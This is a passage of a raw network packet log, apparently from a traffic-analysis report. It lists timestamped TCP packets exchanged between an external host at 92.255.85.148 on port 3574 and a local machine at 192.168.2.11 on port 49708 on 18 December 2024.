                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.170706034 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.170851946 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.173774004 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.173863888 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.174590111 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.177252054 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.177265882 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.177320957 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.180584908 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.180598974 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.181015968 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.183873892 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.183892965 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.184108019 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.187165976 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.187630892 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.187776089 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.191555023 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.191814899 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.191884995 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.194003105 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.194025040 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.194067001 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.196356058 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.196367979 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.196427107 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.199285984 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.199381113 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.199424982 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.202152967 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.202191114 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.202249050 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.205341101 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.205524921 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.205602884 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.208307981 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.208321095 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.208532095 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.211374044 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.211390018 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.211457014 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.214545012 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.214822054 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.214905977 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.217354059 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.217367887 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.217432976 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.220362902 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.220729113 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.220792055 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.223660946 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.223675013 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.223726034 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.227174044 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.227188110 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.227283001 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.229500055 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.229520082 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.229576111 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.232558966 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.232568026 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.232645988 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.235424995 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.235440016 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.235518932 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.238508940 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.238521099 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.238703966 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.241600037 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.241605997 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.241668940 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.244532108 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.244540930 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.244615078 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.247575998 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.247587919 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.247708082 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.250579119 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.250592947 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.250699043 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.253618002 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.253856897 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.253909111 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.256577015 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.256583929 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.256639957 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.259618998 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.259635925 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.259754896 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.262640953 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.262655020 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.262743950 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.265803099 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.308093071 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.351181984 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.351346016 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.351442099 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.352051020 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.352066040 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.352271080 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.354247093 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.354260921 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.354320049 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.356539011 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.356673002 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.356719017 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.359102964 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.359110117 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.359205961 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.361426115 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.361459970 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.361543894 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.363535881 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.363550901 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.363620043 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.365756989 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.365770102 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.366014957 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.367980957 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.368248940 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.368309975 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.370229959 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.370270014 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.370373964 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.372245073 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.372260094 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.372329950 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.374341011 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.374352932 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.374464035 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.376468897 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.376482010 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.376574993 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.378685951 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.379026890 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.379200935 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.380625963 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.380639076 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.380726099 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.382581949 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.382596970 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.382776022 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.384543896 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.384777069 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.384846926 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.386543036 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.386555910 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.386630058 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.388443947 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.388511896 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.388624907 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.390352011 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.390363932 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.390408993 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.392337084 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.392393112 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.392457962 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.394269943 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.394283056 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.394366026 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.396272898 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.396365881 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.396425962 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.398596048 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.398807049 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.398873091 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.400621891 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.400635004 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.400901079 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.401999950 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.402163982 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.402256966 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.403999090 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.404736996 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.404814005 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.405916929 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.406143904 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.406189919 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.407895088 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.407907963 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.407970905 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.409801960 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.409815073 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.409867048 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.411708117 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.411720991 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.411781073 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.413693905 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.413706064 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.413758039 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.415649891 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.415663004 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.415716887 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.417711973 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.417804956 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.418028116 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.419548988 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.419564009 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.419614077 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.421672106 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.421685934 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.421927929 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.423414946 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.423429012 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.423552036 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.425334930 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.425348997 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.425491095 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.427388906 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.427402973 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.427480936 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.429426908 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.429593086 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.429687977 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.431209087 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.431224108 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.431355953 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.433161974 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.433176994 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.433254957 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.435043097 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.435056925 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.435116053 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.437283039 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.437362909 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.437411070 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.439095020 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.439110994 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.439199924 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.440850973 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.440865993 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.441041946 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.442934990 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.443100929 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.443160057 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.444869995 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.444883108 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.444931984 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.446882963 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.447158098 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.447321892 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.448741913 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.448755980 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.448822975 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.450639963 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.450654984 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.450886011 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.543384075 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.543399096 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.543484926 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.543842077 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.544114113 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.544226885 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.545418978 CET35744970892.255.85.148192.168.2.11
